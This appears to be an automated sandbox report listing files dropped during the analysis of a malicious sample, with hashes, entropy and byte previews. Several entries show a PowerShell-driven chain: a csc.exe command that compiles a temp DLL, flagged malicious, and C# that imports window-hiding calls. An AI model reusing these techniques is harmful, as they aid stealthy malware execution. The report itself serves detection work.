                                                                                                          Category:dropped
                                                                                                          Size (bytes):962913
                                                                                                          Entropy (8bit):7.989737613179096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:sSqOuLWyIu1IZX5v4qLJcU9yBpQVDgFVc:8L3b1y5v4UcU2po
                                                                                                          MD5:AC8883CB17CB693C7D43091722EC788D
                                                                                                          SHA1:766C1EBC10D600535474210EF5ADCE790DED7BCB
                                                                                                          SHA-256:A03A90B9BABDDEC10BDCB08CF558149EC71079EEC2791DB48E7AC8DAFE0D4436
                                                                                                          SHA-512:7E14F718BF72D125714D9E58351FF0BA9F21F6FACF5AC4DA8BFA3D2F8B6C5CDD10A7FF5667F52938CC512388F8C971BA99D7F148EF40728C2655E7FC6BBDD90F
                                                                                                          Malicious:false
                                                                                                          Preview:...........}[o\IzX1.d......8I.W.=-.o...Z...3...J...|..$[lv.."........S.......M.I`......... .8....w...%....@.K}......$G.v....s...W...z]...V.uCuT...TS.TC.U....[[m.}...|.....B..<.R.......?.]5..{jV=..............s.-@....Q3.F..z....|.>"hgO}..a.]h..o..l.O.{...P..../..C._...}..0.O...z......._P..O.(1..=..@..B%.1f...q:...Pf. ....mu.Z.z......"....,.\\..Kj.`8...l8.....Vh."*.M...l.j,C.2..3N.....u(s.>oC.E.e..a.~...."...n..G..2........a..G./...V.>_..9h..a.jl...J/Q_........\rz..7+Pf.J/A.y..c..L~.u.........w.J..L.......BM..z.@oE.......T"L......(..................=_....5hgK..g..z...4.....~...q{E.3..m.V.a.x.......Pk........3...c...^.@.C.......<......6.+......m...6.Q...9M.s..e.........$.m.M_.VV.d.~....g.x....x.M..l<....<A...6.8.....j.p.zDnF.K.v&1...C.@.P..=.......O....M.(..5..C.JD.6M...........>...*.4.........&I.-...*...P.d.....`\D1.nB...w....8.0z..;..O........g............@.e...w...NeZ^..a~@...E....*.....2..i.`...w.N..GT.)..v.<.....vD?.<..c......uq......G..)
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 939944
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362282
                                                                                                          Entropy (8bit):7.972590665273909
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:kdG+V4lamSZXs1TOLpVzrKHdUNkjXYyvPoO6Mi7HzU+Nv+3zjZb67WAZFWUni:kRqIZXWOL3rKw4HL+NGvg7LW4i
                                                                                                          MD5:BABCD4D2F710F800534DF8C7513FF17B
                                                                                                          SHA1:D558575EA176DDC203476BB9EE7A65BA773C6293
                                                                                                          SHA-256:7C330301AF2824A4AAF8E2EB3FF69798F0524FF960B00F35132FF00260E6D512
                                                                                                          SHA-512:C952D057C520673627CDC07DFCE995BB3B30541D83FB283F2291F5B0D9014B068871DF41E0DB999204606249B1A92E1BC9D9509B3E71068731AA8CC8A29880DA
                                                                                                          Malicious:false
                                                                                                          Preview:...........{[[G.8.......Hk./.$...kc'......x.2`[...P.f..oWU....s...d3<y..s.......?.5..v.w.....n..C7..]...+|w.F.....'K....O.......]..B.]........=p....=..]......7..........s....f1....'.o..[L\............h'~....u...}..p...s....m..q.j.'.'X....V.fV...}.g..{....=.......c..|..Y.{....>.M....x.g....s..g.........v...}.d..........p.#l}.g..v...Vq.C....{.....f~L.3|.g....}.'.?.3...vC.....M?..}..n.og.k~.^.}.O...5..$..;./.Uo...-..Wo.Wo.|..~w..O..+.7...To..N.....:...W...Z.U_...w......3.U_........G......'.}.....m|?.....?....W......w.z..|.........Zx...-..o'.....C?..0.2.b..#........{.o...........>..... 8...pk..~..).3.I;...C;....V.nv...;\_....Noa..V-..-..6.<...../......>_.g=.NB...0..0.9.?......N.p{..m.g......... ..._cO}...N..w|.c..;.,.....+........_m.._.#.5..'..1.zT....uu.fP.O.z.=.f..j...7.(.@!..._`........n...S.o.n[.F.u.{....-B]...c...x.(.)..s......[NB.].......]<.].7.w._=3...N...aeZ............../...=.....vf......!.,..... X....H...O|b...O..
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:MSVC .res
                                                                                                          Category:dropped
                                                                                                          Size (bytes):652
                                                                                                          Entropy (8bit):3.075613414054284
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHak7YnqqzPN5Dlq5J:+RI+ycuZhN1akSzPNnqX
                                                                                                          MD5:CD2CAC9D25205C3A0C314B6DCB97A6D1
                                                                                                          SHA1:7A7F208789E5E3F1A872C7B2EBC7B1CD7A777AD8
                                                                                                          SHA-256:0FBDB7D269D1E15C7B250A0DB5A5A9393AD3E85FDD9EE190175971F71E394FBE
                                                                                                          SHA-512:CAF6BB0E4E7541821C7EFDF1D800F03B7E636AC6ADAD64EEDC36B64AEC4300588BA217739468AE83424537C5A553E10315177E436E5913AFD6EB3F55C6CF13F7
                                                                                                          Malicious:false
                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.g.p.i.i.k.l.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.g.p.i.i.k.l.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):244
                                                                                                          Entropy (8bit):4.952945910145069
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                                          MD5:6E7BC02C23E28738F9898185137720DB
                                                                                                          SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                                          SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                                          SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                                          Malicious:false
                                                                                                          Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):371
                                                                                                          Entropy (8bit):5.205879785271949
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2KJjq23fhcUezxs7+AEszIKJjq23fhcUT:p37Lvkmb6K9FKUeWZEYFKUT
                                                                                                          MD5:F234FC62D73C05286623DCE6280EF212
                                                                                                          SHA1:E380E1AE15C9225F70393B3BFC7BA6F385A5E352
                                                                                                          SHA-256:900C61039463834692D5C7C9C2C737C623729CA690D19B7029341EE08C4B9BBA
                                                                                                          SHA-512:ABB11435CF932174184FAE09F7A1AA6583961495D13BE8219D107353DF5D43DC67128BBF558BBD3C43D229004AEA95E3A19347D9E484613DEC28AEA57F36460A
                                                                                                          Malicious:true
                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.0.cs"
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3072
                                                                                                          Entropy (8bit):2.7774650259077096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:etGSBJ2JJi8R86QMBT3etkZfdZoD3+WI+ycuZhN1akSzPNnqI:6qNR9Z3RJd+3l1ul1a35qI
                                                                                                          MD5:184246A85385F831A527C57A5B43BCA2
                                                                                                          SHA1:87092CEEA3136044C167A22DBF46BE63E4C184FB
                                                                                                          SHA-256:F57AB5DBE012FA4B4F7D27DF770BE6684C98AFCCE49F205CDB47A2E7307F61FF
                                                                                                          SHA-512:155C014B0534BDEAC45F5253BBD15891A0B03F360718F6440BB5D79E3288403654A933B36A362E8E0FBCC740958C1E159155BF4D289C9F2F96771B836047B1D6
                                                                                                          Malicious:true
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vIg...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):872
                                                                                                          Entropy (8bit):5.296095731795342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:KhId3ka6KnK4E+K3Kax5DqBVKVrdFAMBJTH:ykka6CK4E+K3K2DcVKdBJj
                                                                                                          MD5:FCE6F642EF4FE00BBEB062C6831F2C9F
                                                                                                          SHA1:FBAC1250F0B3E536DAA13639AF3135598261416F
                                                                                                          SHA-256:A9AA2DDD104478AA3A5C919B08100E37ED112AFD3CEC0EF02B8C63659002F3E1
                                                                                                          SHA-512:7DA52912ED6CB49C67FE5F34001702F3D34EEA8A0AE1E03A65FF675BF51E2658850A7A4ABD6F530FA42A45A72ECF04F93861A50DE0E55554211E0604EEA3FA88
                                                                                                          Malicious:false
                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.736788770249448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C5Fhg6bCZiU2B6DsukvhkvklCyw3ESDKfWNCx2OSogZooE8AjKfWNCx2OSogZoo/:wEyCNTJkvhkvCCt/K+NCOH52K+NCOHx
                                                                                                          MD5:0003530A39752BAA969DB5DFC63CABE4
                                                                                                          SHA1:36F59E00486117CD9E7435EA73C7E88B567BF43F
                                                                                                          SHA-256:DCB37FF54882001C85697E63FDFCE28100A00104214A76582B32D9B3CBE6DF8F
                                                                                                          SHA-512:DE471E20A832167B38B84EE4D471CFDC06E28403AD033A5F6382D7F06CD7C71F7B76648B2B43214D9F2CCBE869902069846BB9A8C4309AE3333C3EC9CFA2C7EA
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A........5B..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....oq..5B..,y..5B......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<}Y.A.............................A.p.p.D.a.t.a...B.V.1.....}Y.A..Roaming.@......&W.<}Y.A..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<}Y.A...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....}Y....Windows.@......&W.<}Y.A..............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<}Y.A....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<}Y.A....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<}Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<}Y.A....8...........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.736788770249448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C5Fhg6bCZiU2B6DsukvhkvklCyw3ESDKfWNCx2OSogZooE8AjKfWNCx2OSogZoo/:wEyCNTJkvhkvCCt/K+NCOH52K+NCOHx
                                                                                                          MD5:0003530A39752BAA969DB5DFC63CABE4
                                                                                                          SHA1:36F59E00486117CD9E7435EA73C7E88B567BF43F
                                                                                                          SHA-256:DCB37FF54882001C85697E63FDFCE28100A00104214A76582B32D9B3CBE6DF8F
                                                                                                          SHA-512:DE471E20A832167B38B84EE4D471CFDC06E28403AD033A5F6382D7F06CD7C71F7B76648B2B43214D9F2CCBE869902069846BB9A8C4309AE3333C3EC9CFA2C7EA
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A........5B..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....oq..5B..,y..5B......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<}Y.A.............................A.p.p.D.a.t.a...B.V.1.....}Y.A..Roaming.@......&W.<}Y.A..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<}Y.A...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....}Y....Windows.@......&W.<}Y.A..............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<}Y.A....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<}Y.A....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<}Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<}Y.A....8...........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7380595792139997
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:COohR6bCZiU2hDsukvhkvklCyw3ESDKfWNCx2OSogZooE8AjKfWNCx2OSogZooEG:3QyCNuJkvhkvCCt/K+NCOH52K+NCOHx
                                                                                                          MD5:E131F246FF1086FB36CAD37A6B09C5B1
                                                                                                          SHA1:79D01BE876255A63B1DB34C9C7EC81F9A773842A
                                                                                                          SHA-256:70A966C3A3D10E647BA2D555264B402854B05913CE61108E4453602FA631221F
                                                                                                          SHA-512:1665CFEA42D0D21D6AC606730F29B6784E13EDE8B835EB7610C22ADA7FB85B898E1B57D03E3B3E73A0FDA2CFAF3E7951BB9A37C47B9AA3B2DB8BE5D6A2C816D8
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A........5B..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....oq..5B......5B......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<}Y.A.............................A.p.p.D.a.t.a...B.V.1.....}Y.A..Roaming.@......&W.<}Y.A..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<}Y.A...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....}Y....Windows.@......&W.<}Y.A..............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<}Y.A....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<}Y.A....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<}Y.A..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<}Y.A....8...........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.736788770249448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C5Fhg6bCZiU2B6DsukvhkvklCyw3ESDKfWNCx2OSogZooE8AjKfWNCx2OSogZoo/:wEyCNTJkvhkvCCt/K+NCOH52K+NCOHx
                                                                                                          MD5:0003530A39752BAA969DB5DFC63CABE4
                                                                                                          SHA1:36F59E00486117CD9E7435EA73C7E88B567BF43F
                                                                                                          SHA-256:DCB37FF54882001C85697E63FDFCE28100A00104214A76582B32D9B3CBE6DF8F
                                                                                                          SHA-512:DE471E20A832167B38B84EE4D471CFDC06E28403AD033A5F6382D7F06CD7C71F7B76648B2B43214D9F2CCBE869902069846BB9A8C4309AE3333C3EC9CFA2C7EA
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A........5B..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....oq..5B..,y..5B......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<}Y.A.............................A.p.p.D.a.t.a...B.V.1.....}Y.A..Roaming.@......&W.<}Y.A..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<}Y.A...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....}Y....Windows.@......&W.<}Y.A..............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<}Y.A....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<}Y.A....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<}Y............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<}Y.A....8...........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Preview:@...e...........................................................
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
